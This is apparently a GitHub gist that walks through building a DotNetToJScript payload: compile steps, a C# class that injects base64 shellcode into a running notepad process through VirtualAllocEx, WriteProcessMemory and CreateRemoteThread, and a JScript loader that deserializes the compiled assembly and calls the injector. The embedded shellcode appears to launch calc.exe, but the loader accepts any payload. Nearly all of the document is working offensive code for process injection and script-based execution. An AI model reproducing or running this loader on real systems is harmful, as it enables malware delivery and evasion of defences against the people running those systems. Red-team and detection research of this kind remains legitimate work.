Created
June 19, 2018 10:19
-
-
Save infosecn1nja/fe29c45fc889e5717353006d3d20d5bc to your computer and use it in GitHub Desktop.
DotNetToJScript Build Walkthrough
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Create and Compile Your Binary in CS. In this example ,we will build inject.cs | |
| 2. Convert your DLL to JS using DotNetToJScript | |
| 3. Modify js file for any custom methods, ex lines 131-133 | |
| 4. Execute Script | |
| Code Building Steps | |
| 1. C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library Inject.cs | |
| 2. DotNetToJScript.exe -o Inject.js -v v4 Inject.dll | |
| [This script expects notepad.exe to be running...] | |
| 3. Inject.js | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| public class TestClass | |
| { | |
| public TestClass() | |
| {} | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); | |
| [DllImport("kernel32.dll", CharSet = CharSet.Auto)] | |
| public static extern IntPtr GetModuleHandle(string lpModuleName); | |
| [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] | |
| static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | |
| [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] | |
| static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, | |
| uint dwSize, uint flAllocationType, uint flProtect); | |
| [DllImport("kernel32.dll", SetLastError = true)] | |
| static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten); | |
| [DllImport("kernel32.dll")] | |
| static extern IntPtr CreateRemoteThread(IntPtr hProcess, | |
| IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); | |
| const int PROCESS_CREATE_THREAD = 0x0002; | |
| const int PROCESS_QUERY_INFORMATION = 0x0400; | |
| const int PROCESS_VM_OPERATION = 0x0008; | |
| const int PROCESS_VM_WRITE = 0x0020; | |
| const int PROCESS_VM_READ = 0x0010; | |
| const uint MEM_COMMIT = 0x00001000; | |
| const uint MEM_RESERVE = 0x00002000; | |
| const uint PAGE_READWRITE = 4; | |
| const uint PAGE_EXECUTE_READWRITE = 0x40; | |
| public int Inject(string x86, string x64, string procName) | |
| { | |
| string s; | |
| if(IntPtr.Size == 4) | |
| { | |
| s = x86; | |
| } | |
| else | |
| { | |
| s = x64; | |
| } | |
| byte[] shellcode = Convert.FromBase64String(s); | |
| Process targetProcess = Process.GetProcessesByName(procName)[0]; | |
| Console.WriteLine(targetProcess.Id); | |
| IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id); | |
| IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)shellcode.Length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); | |
| UIntPtr bytesWritten; | |
| WriteProcessMemory(procHandle, allocMemAddress, shellcode, (uint)shellcode.Length , out bytesWritten); | |
| CreateRemoteThread(procHandle, IntPtr.Zero, 0, allocMemAddress, IntPtr.Zero , 0, IntPtr.Zero); | |
| return 0; | |
| } | |
| /* | |
| public static void Main() | |
| { | |
| string x64 = @"/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA"; | |
| string x86 = @"/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu/C1olZoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1WNhbGMuZXhlAA=="; | |
| Inject(x86, x64, "notepad"); | |
| } | |
| */ | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function setversion() { | |
| new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319'; | |
| } | |
| function debug(s) {} | |
| function base64ToStream(b) { | |
| var enc = new ActiveXObject("System.Text.ASCIIEncoding"); | |
| var length = enc.GetByteCount_2(b); | |
| var ba = enc.GetBytes_4(b); | |
| var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); | |
| ba = transform.TransformFinalBlock(ba, 0, length); | |
| var ms = new ActiveXObject("System.IO.MemoryStream"); | |
| ms.Write(ba, 0, (length / 4) * 3); | |
| ms.Position = 0; | |
| return ms; | |
| } | |
| var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+ | |
| "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+ | |
| "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+ | |
| "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+ | |
| "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+ | |
| "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+ | |
| "eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+ | |
| "cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+ | |
| "aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+ | |
| "MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+ | |
| "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+ | |
| "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+ | |
| "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+ | |
| "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+ | |
| "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+ | |
| "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+ | |
| "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+ | |
| "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+ | |
| "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+ | |
| "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+ | |
| "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+ | |
| "ZW1ibHkGFwAAAARMb2FkCg8MAAAAABIAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+ | |
| "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMASGGxWgAAAAAA"+ | |
| "AAAA4AACIQsBCwAACgAAAAYAAAAAAAAeKQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+ | |
| "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAzCgA"+ | |
| "AE8AAAAAQAAAqAIAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+ | |
| "AAAALnRleHQAAAAkCQAAACAAAAAKAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAqAIAAABA"+ | |
| "AAAABAAAAAwAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAQAAAAAAAAAAAA"+ | |
| "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAApAAAAAAAASAAAAAIABQD8IAAA0AcAAAEAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKgIoBAAACgAA"+ | |
| "ACoAEzAHAJIAAAABAAARACgGAAAKGv4BFv4BEwcRBy0GAAMKACsEAAQKAAYoBwAACgsFKAgAAAoW"+ | |
| "mgwIbwkAAAooCgAACgAgOgQAABYIbwkAAAooAgAABg0JfgsAAAoHjmkgADAAAB9AKAUAAAYTBAkR"+ | |
| "BAcHjmkSBSgGAAAGJgl+CwAAChYRBH4LAAAKFn4LAAAKKAcAAAYmFhMGKwARBioAAEJTSkIBAAEA"+ | |
| "AAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAAOgCAAAjfgAAVAMAAIwDAAAjU3RyaW5ncwAAAADg"+ | |
| "BgAACAAAACNVUwDoBgAAEAAAACNHVUlEAAAA+AYAANgAAAAjQmxvYgAAAAAAAAACAAABVx0CFAkA"+ | |
| "AAAA+iUzABYAAAEAAAAJAAAAAgAAAAkAAAAIAAAAGgAAAAsAAAAJAAAAAgAAAAEAAAACAAAABgAA"+ | |
| "AAEAAAACAAAAAAAKAAEAAAAAAAYAMgArAAYAGgL7AQYApAKEAgYAxAKEAgYA7AL7AQYAFQMrAAYA"+ | |
| "JQMrAAoAUQM+AwYAcwMrAAAAAAABAAAAAAABAAEAAQAQABgAAAAFAAEAAQBRgDkACgBRgE8ACgBR"+ | |
| "gGkACgBRgH4ACgBRgI8ACgBRgJ8AJgBRgKoAJgBRgLYAJgBRgMUAJgBQIAAAAACGGNwAPQABAAAA"+ | |
| "AACAAJYg4gBBAAEAAAAAAIAAliDuAEgABAAAAAAAgACRIP4ATQAFAAAAAACAAJEgDQFTAAcAAAAA"+ | |
| "AIAAkSAcAVwADAAAAAAAgACRIC8BZwARAFwgAAAAAIYAQgFyABgAAAABAEkBAAACAFkBAAADAGgB"+ | |
| "AAABAHQBAAABAIEBAAACAIkBAAABAJIBAAACAJsBAAADAKUBAAAEAKwBAAAFAL0BAAABAJIBAAAC"+ | |
| "AMcBAAADANUBAAAEAN4BAgAFAOQBAAABAJIBAAACACcCAAADADoCAAAEAEYCAAAFAFUCAAAGAGEC"+ | |
| "AAAHAHECAAABAHwCAAACAIACAAADAIkBEQDcAD0AGQDcAHkAIQDcAD0ACQDcAD0AKQDcAH4AMQAc"+ | |
| "A4MAOQAtA4cAQQBZA40AQQBsA5QASQB7A5gAMQCFA50ACAAEAA0ACAAIABIACAAMABcACAAQABwA"+ | |
| "CAAUACEACQAYACkACQAcAC4ACQAgADMACQAkADgALgATAK0ALgAbALYAoAD/AgwDAAEFAOIAAQAG"+ | |
| "AQcA7gABAEMBCQD+AAIAQQELAA0BAQBAAQ0AHAEBAAABDwAvAQEABIAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "4gIAAAQAAAAAAAAAAAAAAAEAIgAAAAAABAAAAAAAAAAAAAAAAQArAAAAAAAAAAA8TW9kdWxlPgBI"+ | |
| "VEFJbmplY3QuZGxsAFRlc3RDbGFzcwBtc2NvcmxpYgBTeXN0ZW0AT2JqZWN0AFBST0NFU1NfQ1JF"+ | |
| "QVRFX1RIUkVBRABQUk9DRVNTX1FVRVJZX0lORk9STUFUSU9OAFBST0NFU1NfVk1fT1BFUkFUSU9O"+ | |
| "AFBST0NFU1NfVk1fV1JJVEUAUFJPQ0VTU19WTV9SRUFEAE1FTV9DT01NSVQATUVNX1JFU0VSVkUA"+ | |
| "UEFHRV9SRUFEV1JJVEUAUEFHRV9FWEVDVVRFX1JFQURXUklURQAuY3RvcgBPcGVuUHJvY2VzcwBH"+ | |
| "ZXRNb2R1bGVIYW5kbGUAR2V0UHJvY0FkZHJlc3MAVmlydHVhbEFsbG9jRXgAV3JpdGVQcm9jZXNz"+ | |
| "TWVtb3J5AENyZWF0ZVJlbW90ZVRocmVhZABJbmplY3QAZHdEZXNpcmVkQWNjZXNzAGJJbmhlcml0"+ | |
| "SGFuZGxlAGR3UHJvY2Vzc0lkAGxwTW9kdWxlTmFtZQBoTW9kdWxlAHByb2NOYW1lAGhQcm9jZXNz"+ | |
| "AGxwQWRkcmVzcwBkd1NpemUAZmxBbGxvY2F0aW9uVHlwZQBmbFByb3RlY3QAbHBCYXNlQWRkcmVz"+ | |
| "cwBscEJ1ZmZlcgBuU2l6ZQBscE51bWJlck9mQnl0ZXNXcml0dGVuAFN5c3RlbS5SdW50aW1lLklu"+ | |
| "dGVyb3BTZXJ2aWNlcwBPdXRBdHRyaWJ1dGUAbHBUaHJlYWRBdHRyaWJ1dGVzAGR3U3RhY2tTaXpl"+ | |
| "AGxwU3RhcnRBZGRyZXNzAGxwUGFyYW1ldGVyAGR3Q3JlYXRpb25GbGFncwBscFRocmVhZElkAHg4"+ | |
| "NgB4NjQAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRp"+ | |
| "b25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEhUQUluamVjdABEbGxJ"+ | |
| "bXBvcnRBdHRyaWJ1dGUAa2VybmVsMzIuZGxsAGtlcm5lbDMyAEludFB0cgBnZXRfU2l6ZQBDb252"+ | |
| "ZXJ0AEZyb21CYXNlNjRTdHJpbmcAU3lzdGVtLkRpYWdub3N0aWNzAFByb2Nlc3MAR2V0UHJvY2Vz"+ | |
| "c2VzQnlOYW1lAGdldF9JZABDb25zb2xlAFdyaXRlTGluZQBaZXJvAAAAAAMgAAAAAACYOUOmVZX0"+ | |
| "Tr1fZSUxEnD/AAi3elxWGTTgiQIGCAQCAAAABAAEAAAECAAAAAQgAAAABBAAAAACBgkEABAAAAQA"+ | |
| "IAAABAQAAAAEQAAAAAMgAAEGAAMYCAIIBAABGA4FAAIYGA4IAAUYGBgJCQkKAAUCGBgdBQkQGQoA"+ | |
| "BxgYGAkYGAkYBiADCA4ODgQgAQEIBCABAQ4DAAAIBQABHQUOBgABHRIhDgMgAAgEAAEBCAIGGAwH"+ | |
| "CA4dBRIhGBgZCAIIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBAAAA9CgA"+ | |
| "AAAAAAAAAAAADikAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApAAAAAAAAAAAAAAAAX0NvckRs"+ | |
| "bE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAA"+ | |
| "AAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAATAIAAAAAAAAAAAAATAI0AAAA"+ | |
| "VgBTAF8AVgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AD8AAAAAAAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8A"+ | |
| "AAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBKwBAAABAFMAdAByAGkAbgBn"+ | |
| "AEYAaQBsAGUASQBuAGYAbwAAAIgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUA"+ | |
| "RABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBu"+ | |
| "AAAAAAAwAC4AMAAuADAALgAwAAAAPAAOAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABIAFQA"+ | |
| "QQBJAG4AagBlAGMAdAAuAGQAbABsAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0"+ | |
| "AAAAIAAAAEQADgABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABIAFQAQQBJAG4A"+ | |
| "agBlAGMAdAAuAGQAbABsAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAu"+ | |
| "ADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4A"+ | |
| "MAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAACAAAAwAAAAgOQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ | |
| "AAAAAAAAAAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVm"+ | |
| "bGVjdGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA"; | |
| var entry_class = 'TestClass'; | |
| try { | |
| setversion(); | |
| var stm = base64ToStream(serialized_obj); | |
| var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); | |
| var al = new ActiveXObject('System.Collections.ArrayList'); | |
| var d = fmt.Deserialize_2(stm); | |
| al.Add(undefined); | |
| var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); | |
| var x64 = "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA"; | |
| var x86 = "/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu/C1olZoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1WNhbGMuZXhlAA=="; | |
| var ret = o.Inject(x86, x64, 'notepad'); | |
| } catch (e) { | |
| debug(e.message); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment